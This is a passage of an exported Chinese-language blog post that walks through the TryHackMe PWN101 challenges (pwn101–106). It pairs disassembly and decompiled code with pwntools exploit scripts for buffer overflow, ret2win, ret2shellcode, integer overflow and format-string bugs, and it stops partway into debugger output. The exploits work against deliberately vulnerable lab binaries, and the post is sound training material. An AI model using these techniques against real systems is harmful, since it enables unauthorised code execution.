{"id":708,"date":"2025-03-19T15:35:00","date_gmt":"2025-03-19T07:35:00","guid":{"rendered":"https:\/\/chengyunpu.com\/wordpress\/?p=708"},"modified":"2026-03-24T16:39:38","modified_gmt":"2026-03-24T08:39:38","slug":"tryhackme-pwn101","status":"publish","type":"post","link":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/","title":{"rendered":"TryHackMe PWN101"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li>Buffer overflow<\/li>\n\n\n\n<li>Modify variable&#8217;s value<\/li>\n\n\n\n<li>Return to win<\/li>\n\n\n\n<li>Return to shellcode<\/li>\n\n\n\n<li>Integer Overflow<\/li>\n\n\n\n<li>Format string exploit<\/li>\n\n\n\n<li>Bypassing mitigations<\/li>\n\n\n\n<li>GOT overwrite<\/li>\n\n\n\n<li>Return to PLT<\/li>\n\n\n\n<li>Playing with ROP<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 101 &#8211; Buffer overflow<\/h2>\n\n\n\n<p>no stack canary \u89c0\u5bdf\u5f97\u77e5 rbp-0x4 \u662f 0x539\uff0c\u7576 rbp-0x4 \u9019\u6bb5\u7a7a\u9593\u7684\u503c\u4e0d\u662f 0x539 \u6642\uff0c\u6703\u6709 system(&#8216;\/bin\/sh&#8217;) \u53ef\u4ee5 RCE\uff0c\u5229\u7528 gets \u585e\u6eff rbp-0x40\uff0c\u9806\u5e36\u628a rbp-0x4 \u84cb\u904e\u5373\u53ef\u62ff\u5230 shell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x000000000000088e &lt;+0&gt;:     push   rbp\n   0x000000000000088f &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000000892 &lt;+4&gt;:     sub    rsp,0x40\n   0x0000000000000896 &lt;+8&gt;:     mov    DWORD PTR [rbp-0x4],0x539\n   0x000000000000089d &lt;+15&gt;:    mov    eax,0x0\n   0x00000000000008a2 &lt;+20&gt;:    call   0x81a &lt;setup&gt;\n   0x00000000000008a7 &lt;+25&gt;:    mov    eax,0x0\n   0x00000000000008ac &lt;+30&gt;:    call   0x87b &lt;banner&gt;\n   0x00000000000008b1 &lt;+35&gt;:    lea    rdi,[rip+0x208]        # 0xac0\n   0x00000000000008b8 &lt;+42&gt;:    call   0x6b0 &lt;puts@plt&gt;\n   0x00000000000008bd &lt;+47&gt;:    lea    rdi,[rip+0x2dc]        # 0xba0\n   0x00000000000008c4 &lt;+54&gt;:    call   0x6b0 &lt;puts@plt&gt;\n   0x00000000000008c9 &lt;+59&gt;:    lea    rax,[rbp-0x40]\n   0x00000000000008cd &lt;+63&gt;:    mov    rdi,rax\n   0x00000000000008d0 &lt;+66&gt;:    mov    eax,0x0\n   0x00000000000008d5 &lt;+71&gt;:    call   0x6d0 &lt;gets@plt&gt;\n   0x00000000000008da &lt;+76&gt;:    cmp    DWORD PTR [rbp-0x4],0x539\n   0x00000000000008e1 &lt;+83&gt;:    jne    0x8f9 &lt;main+107&gt;\n   0x00000000000008e3 &lt;+85&gt;:    lea    rdi,[rip+0x2e6]        # 0xbd0\n   0x00000000000008ea &lt;+92&gt;:    call   0x6b0 &lt;puts@plt&gt;\n   0x00000000000008ef &lt;+97&gt;:    mov    edi,0x539\n   0x00000000000008f4 &lt;+102&gt;:   call   0x6f0 &lt;exit@plt&gt;\n   0x00000000000008f9 &lt;+107&gt;:   lea    rdi,[rip+0x318]        # 0xc18\n   0x0000000000000900 &lt;+114&gt;:   call   0x6b0 &lt;puts@plt&gt;\n   0x0000000000000905 &lt;+119&gt;:   lea    rdi,[rip+0x333]        # 0xc3f\n   0x000000000000090c &lt;+126&gt;:   call   0x6c0 &lt;system@plt&gt;\n   0x0000000000000911 &lt;+131&gt;:   nop\n   0x0000000000000912 &lt;+132&gt;:   leave\n   0x0000000000000913 &lt;+133&gt;:   ret\nEnd of assembler dump.\npwndbg&gt; x\/s 0xc3f\n0xc3f:  \"\/bin\/sh\"<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nip='10.10.101.156'\nport=9001\nr=remote(ip,port)\n\nr.sendline(b'a'*0x40)\nr.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 102 &#8211; Modify variable&#8217;s value<\/h2>\n\n\n\n<p>\u521d\u59cb rbp-0x4 \u5b58 0xbadf00d , rbp-0x8 \u5b58 0xfee1dead \uff0c scanf \u5132\u5b58\u7684\u5167\u5bb9\u5f9e rbp-0x70 \u958b\u59cb\uff0c\u5176\u4e2d if rbp-0x4 \u6539\u6210 0xc0ff33\u3001 rbp-0x8 \u6539\u6210 0xc0d3 \u53ef\u4ee5\u62ff\u5230 shell \uff0c\u5f9e 0x70 \u958b\u59cb\u5f80\u4e0a\u585e padding \u6703\u5148\u9047\u5230 rbp-0x8 \u6240\u4ee5\u5148\u9001 0xc0d3 \u518d\u9001 0xc0ff33\uff0c\u56e0\u70ba\u9019\u5169\u500b\u503c\u90fd\u662f\u5360 4 bytes \u6240\u4ee5\u7528 p32() \u9001\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x00000000000008fe &lt;+0&gt;:     push   rbp\n   0x00000000000008ff &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000000902 &lt;+4&gt;:     sub    rsp,0x70\n   0x0000000000000906 &lt;+8&gt;:     mov    eax,0x0\n   0x000000000000090b &lt;+13&gt;:    call   0x88a &lt;setup&gt;\n   0x0000000000000910 &lt;+18&gt;:    mov    eax,0x0\n   0x0000000000000915 &lt;+23&gt;:    call   0x8eb &lt;banner&gt;\n   0x000000000000091a &lt;+28&gt;:    mov    DWORD PTR [rbp-0x4],0xbadf00d\n   0x0000000000000921 &lt;+35&gt;:    mov    DWORD PTR [rbp-0x8],0xfee1dead\n   0x0000000000000928 &lt;+42&gt;:    mov    edx,DWORD PTR [rbp-0x8]\n   0x000000000000092b &lt;+45&gt;:    mov    eax,DWORD PTR [rbp-0x4]\n   0x000000000000092e &lt;+48&gt;:    mov    esi,eax\n   0x0000000000000930 &lt;+50&gt;:    lea    rdi,[rip+0x212]        # 0xb49\n   0x0000000000000937 &lt;+57&gt;:    mov    eax,0x0\n   0x000000000000093c &lt;+62&gt;:    call   0x730 &lt;printf@plt&gt;\n   0x0000000000000941 &lt;+67&gt;:    lea    rax,[rbp-0x70]\n   0x0000000000000945 &lt;+71&gt;:    mov    rsi,rax\n   0x0000000000000948 &lt;+74&gt;:    lea    rdi,[rip+0x217]        # 0xb66\n   0x000000000000094f &lt;+81&gt;:    mov    eax,0x0\n   0x0000000000000954 &lt;+86&gt;:    call   0x750 &lt;__isoc99_scanf@plt&gt;\n   0x0000000000000959 &lt;+91&gt;:    cmp    DWORD PTR [rbp-0x4],0xc0ff33\n   0x0000000000000960 &lt;+98&gt;:    jne    0x992 &lt;main+148&gt;\n   0x0000000000000962 &lt;+100&gt;:   cmp    DWORD PTR [rbp-0x8],0xc0d3\n   0x0000000000000969 &lt;+107&gt;:   jne    0x992 &lt;main+148&gt;\n   0x000000000000096b &lt;+109&gt;:   mov    edx,DWORD PTR [rbp-0x8]\n   0x000000000000096e &lt;+112&gt;:   mov    eax,DWORD PTR [rbp-0x4]\n   0x0000000000000971 &lt;+115&gt;:   mov    esi,eax\n   0x0000000000000973 &lt;+117&gt;:   lea    rdi,[rip+0x1ef]        # 0xb69\n   0x000000000000097a &lt;+124&gt;:   mov    eax,0x0\n   0x000000000000097f &lt;+129&gt;:   call   0x730 &lt;printf@plt&gt;\n   0x0000000000000984 &lt;+134&gt;:   lea    rdi,[rip+0x1f4]        # 0xb7f\n   0x000000000000098b &lt;+141&gt;:   call   0x720 &lt;system@plt&gt;\n   0x0000000000000990 &lt;+146&gt;:   jmp    0x9a8 &lt;main+170&gt;\n   0x0000000000000992 &lt;+148&gt;:   lea    rdi,[rip+0x1ef]        # 0xb88\n   0x0000000000000999 &lt;+155&gt;:   call   0x710 &lt;puts@plt&gt;\n   0x000000000000099e &lt;+160&gt;:   mov    edi,0x539\n   0x00000000000009a3 &lt;+165&gt;:   call   0x760 &lt;exit@plt&gt;\n   0x00000000000009a8 &lt;+170&gt;:   leave\n   0x00000000000009a9 &lt;+171&gt;:   ret\nEnd of assembler dump.\npwndbg&gt; x\/s 0xb7f\n0xb7f:  \"\/bin\/sh\"<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nip='10.10.101.156'\nport=9002\nr=remote(ip,port)\n\nr.sendline(b'a'*104 + p32(0xc0d3) + p32(0xc0ff33))\nr.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 103 &#8211; Return to win<\/h2>\n\n\n\n<p>\u76f4\u63a5\u8dd1\u8d77\u4f86\u9577\u9019\u6a23<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/pwn]\n\u2514\u2500$ .\/pwn103-1644300337872.pwn103 \n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u285f\u2801\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2808\u28b9\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2804\u28a0\u28f4\u28fe\u28f5\u28f6\u28f6\u28fe\u28ff\u28e6\u2844\u2804\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2880\u28fe\u28ff\u28ff\u28bf\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2844\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u28b8\u28ff\u28ff\u28e7\u28c0\u28fc\u28ff\u28c4\u28e0\u28ff\u28ff\u28ff\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2818\u283b\u28b7\u286f\u281b\u281b\u281b\u281b\u28ab\u28ff\u281f\u281b\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u2847\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u28e7\u2840\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u2804\u28a1\u28c0\u2804\u2804\u28b8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f6\u28c6\u28f8\u28ff\u28ff\u28ff                                                                                                     \n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff                                                                                                     \n                                                                                                                             \n  [THM Discord Server]                                                                                                       \n\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n1) \ud83d\udce2 Announcements\n2) \ud83d\udcdc Rules\n3) \ud83d\udde3  General\n4) \ud83c\udfe0 rooms discussion\n5) \ud83e\udd16 Bot commands\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\u2328  Choose the channel: <\/code><\/pre>\n\n\n\n<p>\u5176\u4e2d\u9078\u9805 3 \u7684 General function \u4e2d\u7684 strcmp \u53ef\u4ee5 overflow\uff0cscanf \u8f38\u5165\u7684\u503c\u6703\u5b58\u5728 rbp-0x20 \u5728\u52a0\u4e0a rbp \u7684 8 bytes \u7576\u4f5c padding <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble general\nDump of assembler code for function general:\n   0x00000000004012be &lt;+0&gt;:     push   rbp\n   0x00000000004012bf &lt;+1&gt;:     mov    rbp,rsp\n   0x00000000004012c2 &lt;+4&gt;:     sub    rsp,0x20\n   0x00000000004012c6 &lt;+8&gt;:     lea    rax,[rip+0x10dd]        # 0x4023aa\n   0x00000000004012cd &lt;+15&gt;:    mov    rdi,rax\n   0x00000000004012d0 &lt;+18&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x00000000004012d5 &lt;+23&gt;:    lea    rax,[rip+0x10e4]        # 0x4023c0\n   0x00000000004012dc &lt;+30&gt;:    mov    rdi,rax\n   0x00000000004012df &lt;+33&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x00000000004012e4 &lt;+38&gt;:    lea    rax,[rip+0x10fd]        # 0x4023e8\n   0x00000000004012eb &lt;+45&gt;:    mov    rdi,rax\n   0x00000000004012ee &lt;+48&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x00000000004012f3 &lt;+53&gt;:    lea    rax,[rip+0x111e]        # 0x402418\n   0x00000000004012fa &lt;+60&gt;:    mov    rdi,rax\n   0x00000000004012fd &lt;+63&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x0000000000401302 &lt;+68&gt;:    lea    rax,[rip+0x1143]        # 0x40244c\n   0x0000000000401309 &lt;+75&gt;:    mov    rdi,rax\n   0x000000000040130c &lt;+78&gt;:    mov    eax,0x0\n   0x0000000000401311 &lt;+83&gt;:    call   0x401060 &lt;printf@plt&gt;\n   0x0000000000401316 &lt;+88&gt;:    lea    rax,[rbp-0x20]\n   0x000000000040131a &lt;+92&gt;:    mov    rsi,rax\n   0x000000000040131d &lt;+95&gt;:    lea    rax,[rip+0x1138]        # 0x40245c\n   0x0000000000401324 &lt;+102&gt;:   mov    rdi,rax\n   0x0000000000401327 &lt;+105&gt;:   mov    eax,0x0\n   0x000000000040132c &lt;+110&gt;:   call   0x4010a0 &lt;__isoc99_scanf@plt&gt;\n   0x0000000000401331 &lt;+115&gt;:   lea    rax,[rbp-0x20]\n   0x0000000000401335 &lt;+119&gt;:   lea    rdx,[rip+0x1123]        # 0x40245f\n   0x000000000040133c &lt;+126&gt;:   mov    rsi,rdx\n   0x000000000040133f &lt;+129&gt;:   mov    rdi,rax\n   0x0000000000401342 &lt;+132&gt;:   call   0x401080 &lt;strcmp@plt&gt;\n   0x0000000000401347 &lt;+137&gt;:   test   eax,eax\n   0x0000000000401349 &lt;+139&gt;:   jne    0x401366 &lt;general+168&gt;\n   0x000000000040134b &lt;+141&gt;:   lea    rax,[rip+0x1111]        # 0x402463\n   0x0000000000401352 &lt;+148&gt;:   mov    rdi,rax\n   0x0000000000401355 &lt;+151&gt;:   call   0x401040 &lt;puts@plt&gt;\n   0x000000000040135a &lt;+156&gt;:   mov    eax,0x0\n   0x000000000040135f &lt;+161&gt;:   call   0x40158c &lt;main&gt;\n   0x0000000000401364 &lt;+166&gt;:   jmp    0x401375 &lt;general+183&gt;\n   0x0000000000401366 &lt;+168&gt;:   lea    rax,[rip+0x1112]        # 0x40247f\n   0x000000000040136d &lt;+175&gt;:   mov    rdi,rax\n   0x0000000000401370 &lt;+178&gt;:   call   0x401040 &lt;puts@plt&gt;\n   0x0000000000401375 &lt;+183&gt;:   nop\n   0x0000000000401376 &lt;+184&gt;:   leave\n   0x0000000000401377 &lt;+185&gt;:   ret<\/code><\/pre>\n\n\n\n<p>\u5728\u9019\u652f ELF \u6709\u500b admins_only \u7684 function \u53ef\u4ee5 RCE\uff0cpadding \u585e\u5b8c\u5f8c\uff0c\u628a ret \u7684\u4f4d\u7f6e\u84cb\u6210\u9019 function \u7684 address<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble admins_only\nDump of assembler code for function admins_only:\n   0x0000000000401554 &lt;+0&gt;:     push   rbp\n   0x0000000000401555 &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000401558 &lt;+4&gt;:     sub    rsp,0x10\n   0x000000000040155c &lt;+8&gt;:     lea    rax,[rip+0x1d04]        # 0x403267\n   0x0000000000401563 &lt;+15&gt;:    mov    rdi,rax\n   0x0000000000401566 &lt;+18&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x000000000040156b &lt;+23&gt;:    lea    rax,[rip+0x1d0a]        # 0x40327c\n   0x0000000000401572 &lt;+30&gt;:    mov    rdi,rax\n   0x0000000000401575 &lt;+33&gt;:    call   0x401040 &lt;puts@plt&gt;\n   0x000000000040157a &lt;+38&gt;:    lea    rax,[rip+0x1d0e]        # 0x40328f\n   0x0000000000401581 &lt;+45&gt;:    mov    rdi,rax\n   0x0000000000401584 &lt;+48&gt;:    call   0x401050 &lt;system@plt&gt;\n   0x0000000000401589 &lt;+53&gt;:    nop\n   0x000000000040158a &lt;+54&gt;:    leave\n   0x000000000040158b &lt;+55&gt;:    ret\nEnd of assembler dump.\npwndbg&gt; x\/s 0x40328f\n0x40328f:       \"\/bin\/sh\"<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n#r=process('.\/pwn103-1644300337872.pwn103')\nip='10.10.100.188'\nport=9003\nr=remote(ip,port)\n\nr.sendline(b'3')\nr.sendline(b'a'*0x28 + p64(0x401555))\nr.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 104 &#8211; Return to shellcode<\/h2>\n\n\n\n<p>\u4fdd\u8b77\u5168\u95dc\u7684\u4e00\u984c\uff0c\u89c0\u5bdf\u5f97\u77e5 offset \u662f 80 (rbp-0x50) +8 (rbp) \uff0c\u5148\u586b\u5165 shellcode \u5728\u5c07 ret addr \u586b\u70ba shellcode \u6240\u5728\u7684\u4f4d\u7f6e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x00000000004011cd &lt;+0&gt;:     push   rbp\n   0x00000000004011ce &lt;+1&gt;:     mov    rbp,rsp\n   0x00000000004011d1 &lt;+4&gt;:     sub    rsp,0x50\n   0x00000000004011d5 &lt;+8&gt;:     mov    eax,0x0\n   0x00000000004011da &lt;+13&gt;:    call   0x401156 &lt;setup&gt;\n   0x00000000004011df &lt;+18&gt;:    mov    eax,0x0\n   0x00000000004011e4 &lt;+23&gt;:    call   0x4011b7 &lt;banner&gt;\n   0x00000000004011e9 &lt;+28&gt;:    lea    rax,[rip+0xf30]        # 0x402120\n   0x00000000004011f0 &lt;+35&gt;:    mov    rdi,rax\n   0x00000000004011f3 &lt;+38&gt;:    call   0x401030 &lt;puts@plt&gt;\n   0x00000000004011f8 &lt;+43&gt;:    lea    rax,[rip+0xf49]        # 0x402148\n   0x00000000004011ff &lt;+50&gt;:    mov    rdi,rax\n   0x0000000000401202 &lt;+53&gt;:    call   0x401030 &lt;puts@plt&gt;\n   0x0000000000401207 &lt;+58&gt;:    lea    rax,[rip+0xf62]        # 0x402170\n   0x000000000040120e &lt;+65&gt;:    mov    rdi,rax\n   0x0000000000401211 &lt;+68&gt;:    call   0x401030 &lt;puts@plt&gt;\n   0x0000000000401216 &lt;+73&gt;:    lea    rax,[rbp-0x50]\n   0x000000000040121a &lt;+77&gt;:    mov    rsi,rax\n   0x000000000040121d &lt;+80&gt;:    lea    rax,[rip+0xf6c]        # 0x402190\n   0x0000000000401224 &lt;+87&gt;:    mov    rdi,rax\n   0x0000000000401227 &lt;+90&gt;:    mov    eax,0x0\n   0x000000000040122c &lt;+95&gt;:    call   0x401040 &lt;printf@plt&gt;\n   0x0000000000401231 &lt;+100&gt;:   lea    rax,[rbp-0x50]\n   0x0000000000401235 &lt;+104&gt;:   mov    edx,0xc8\n   0x000000000040123a &lt;+109&gt;:   mov    rsi,rax\n   0x000000000040123d &lt;+112&gt;:   mov    edi,0x0\n   0x0000000000401242 &lt;+117&gt;:   mov    eax,0x0\n   0x0000000000401247 &lt;+122&gt;:   call   0x401050 &lt;read@plt&gt;\n   0x000000000040124c &lt;+127&gt;:   nop\n   0x000000000040124d &lt;+128&gt;:   leave\n=&gt; 0x000000000040124e &lt;+129&gt;:   ret<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\ncontext.arch = 'amd64'\nio=process('.\/pwn104-1644300377109.pwn104')\nio.recvlines(9)\n\nio.recvuntil(b\"I'm waiting for you at \")\naddr=int(io.recv().strip(),16)\n\nshellcode = asm(shellcraft.sh())\n\nio.send(shellcode.ljust(88,b'a')+p64(addr))\nio.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 105 &#8211; Integer Overflow<\/h2>\n\n\n\n<p>IDA decompile<\/p>\n\n\n\n<p>\u5fc5\u9808\u6eff\u8db3\u984c\u76ee(v5 &amp; 0x80000000) != 0 || (v6 &amp; 0x80000000) != 0 \u624d\u80fd\u6709\u6a5f\u6703\u8df3\u5230\/bin\/sh\u610f\u601d\u662fv5\u3001v6\u5fc5\u9808\u8981\u662f\u5c0f\u65bc0x80000000\u4e5f\u5c31\u662f\u5c0f\u65bc\u7b49\u65bcC\u88e1\u9762int\u6700\u5927\u503c2147483647\uff0c\u4f46\u662f\u8981\u9700\u8981v5+v6\u4e5f\u5c31\u662fv7\u5927\u65bc\u7b49\u65bc0x80000000\u624d\u6703(v7 &amp; 0x80000000) != 0<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  unsigned int v5; \/\/ [rsp+Ch] [rbp-14h] BYREF\n  unsigned int v6; \/\/ [rsp+10h] [rbp-10h] BYREF\n  unsigned int v7; \/\/ [rsp+14h] [rbp-Ch]\n  unsigned __int64 v8; \/\/ [rsp+18h] [rbp-8h]\n\n  v8 = __readfsqword(0x28u);\n  setup(argc, argv, envp);\n  banner();\n  puts(\"-------=[ BAD INTEGERS ]=-------\");\n  puts(\"|-&lt; Enter two numbers to add &gt;-|\\n\");\n  printf(\"]&gt;&gt; \");\n  __isoc99_scanf(\"%d\", &amp;v5);\n  printf(\"]&gt;&gt; \");\n  __isoc99_scanf(\"%d\", &amp;v6);\n  v7 = v5 + v6;\n  if ( (v5 &amp; 0x80000000) != 0 || (v6 &amp; 0x80000000) != 0 )\n  {\n    printf(\"\\n[o.O] Hmmm... that was a Good try!\\n\");\n  }\n  else if ( (v7 &amp; 0x80000000) != 0 )\n  {\n    printf(\"\\n[*] C: %d\", v7);\n    puts(\"\\n[*] Popped Shell\\n[*] Switching to interactive mode\");\n    system(\"\/bin\/sh\");\n  }\n  else\n  {\n    printf(\"\\n[*] ADDING %d + %d\", v5, v6);\n    printf(\"\\n[*] RESULT: %d\\n\", v7);\n  }\n  return v8 - __readfsqword(0x28u);\n}<\/code><\/pre>\n\n\n\n<p>v5\u586b2147483647\u3001v6\u586b1\uff0c\u8b93v5+v6(v7)\u5927\u65bcint\u6700\u5927\u503c<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nip='10.10.12.233'\nport=9005\nr=remote(ip,port)\n\nr.recvlines(9)\nr.sendlineafter(']&gt;&gt;',b'2147483647')\nr.sendlineafter(']&gt;&gt;',b'1')\nr.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 106 &#8211; Format string exploit<\/h2>\n\n\n\n<p>printf() \u7684\u5730\u65b9\u6709 fmt vuln <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x000000000000123e &lt;+0&gt;:     push   rbp\n   0x000000000000123f &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000001242 &lt;+4&gt;:     sub    rsp,0x60\n   0x0000000000001246 &lt;+8&gt;:     mov    rax,QWORD PTR fs:0x28\n   0x000000000000124f &lt;+17&gt;:    mov    QWORD PTR [rbp-0x8],rax\n   0x0000000000001253 &lt;+21&gt;:    xor    eax,eax\n   0x0000000000001255 &lt;+23&gt;:    mov    eax,0x0\n   0x000000000000125a &lt;+28&gt;:    call   0x1179 &lt;setup&gt;\n   0x000000000000125f &lt;+33&gt;:    mov    eax,0x0\n   0x0000000000001264 &lt;+38&gt;:    call   0x1201 &lt;banner&gt;\n   0x0000000000001269 &lt;+43&gt;:    movabs rax,0x5b5858587b4d4854\n   0x0000000000001273 &lt;+53&gt;:    movabs rdx,0x6465725f67616c66\n   0x000000000000127d &lt;+63&gt;:    mov    QWORD PTR [rbp-0x60],rax\n   0x0000000000001281 &lt;+67&gt;:    mov    QWORD PTR [rbp-0x58],rdx\n   0x0000000000001285 &lt;+71&gt;:    movabs rax,0x58585d6465746361\n   0x000000000000128f &lt;+81&gt;:    mov    QWORD PTR [rbp-0x50],rax\n   0x0000000000001293 &lt;+85&gt;:    mov    WORD PTR [rbp-0x48],0x7d58\n   0x0000000000001299 &lt;+91&gt;:    mov    BYTE PTR [rbp-0x46],0x0\n   0x000000000000129d &lt;+95&gt;:    lea    rax,[rip+0xe75]        # 0x2119\n   0x00000000000012a4 &lt;+102&gt;:   mov    rdi,rax\n   0x00000000000012a7 &lt;+105&gt;:   call   0x1030 &lt;puts@plt&gt;\n   0x00000000000012ac &lt;+110&gt;:   lea    rax,[rip+0xe85]        # 0x2138\n   0x00000000000012b3 &lt;+117&gt;:   mov    rdi,rax\n   0x00000000000012b6 &lt;+120&gt;:   mov    eax,0x0\n   0x00000000000012bb &lt;+125&gt;:   call   0x1050 &lt;printf@plt&gt;\n   0x00000000000012c0 &lt;+130&gt;:   lea    rax,[rbp-0x40]\n   0x00000000000012c4 &lt;+134&gt;:   mov    edx,0x32\n   0x00000000000012c9 &lt;+139&gt;:   mov    rsi,rax\n   0x00000000000012cc &lt;+142&gt;:   mov    edi,0x0\n   0x00000000000012d1 &lt;+147&gt;:   mov    eax,0x0\n   0x00000000000012d6 &lt;+152&gt;:   call   0x1060 &lt;read@plt&gt;\n   0x00000000000012db &lt;+157&gt;:   lea    rax,[rip+0xe8f]        # 0x2171\n   0x00000000000012e2 &lt;+164&gt;:   mov    rdi,rax\n   0x00000000000012e5 &lt;+167&gt;:   mov    eax,0x0\n   0x00000000000012ea &lt;+172&gt;:   call   0x1050 &lt;printf@plt&gt;\n   0x00000000000012ef &lt;+177&gt;:   lea    rax,[rbp-0x40]\n   0x00000000000012f3 &lt;+181&gt;:   mov    rdi,rax\n   0x00000000000012f6 &lt;+184&gt;:   mov    eax,0x0\n   0x00000000000012fb &lt;+189&gt;:   call   0x1050 &lt;printf@plt&gt;\n   0x0000000000001300 &lt;+194&gt;:   nop\n   0x0000000000001301 &lt;+195&gt;:   mov    rax,QWORD PTR [rbp-0x8]\n   0x0000000000001305 &lt;+199&gt;:   sub    rax,QWORD PTR fs:0x28\n   0x000000000000130e &lt;+208&gt;:   je     0x1315 &lt;main+215&gt;\n   0x0000000000001310 &lt;+210&gt;:   call   0x1040 &lt;__stack_chk_fail@plt&gt;\n   0x0000000000001315 &lt;+215&gt;:   leave\n   0x0000000000001316 &lt;+216&gt;:   ret<\/code><\/pre>\n\n\n\n<p>\u7528 pwndbg \u9a57\u8b49 flag \u6709\u5b58\u5728 stack \u4e0a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; r\nStarting program: \/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\/lib\/x86_64-linux-gnu\/libthread_db.so.1\".\n\nBreakpoint 1, 0x0000555555555242 in main ()\nLEGEND: STACK | HEAP | CODE | DATA | WX | RODATA\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ REGISTERS \/ show-flags off \/ show-compact-regs off ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n RAX  0x55555555523e (main) \u25c2\u2014 push rbp\n RBX  0x7fffffffde58 \u2014\u25b8 0x7fffffffe1c6 \u25c2\u2014 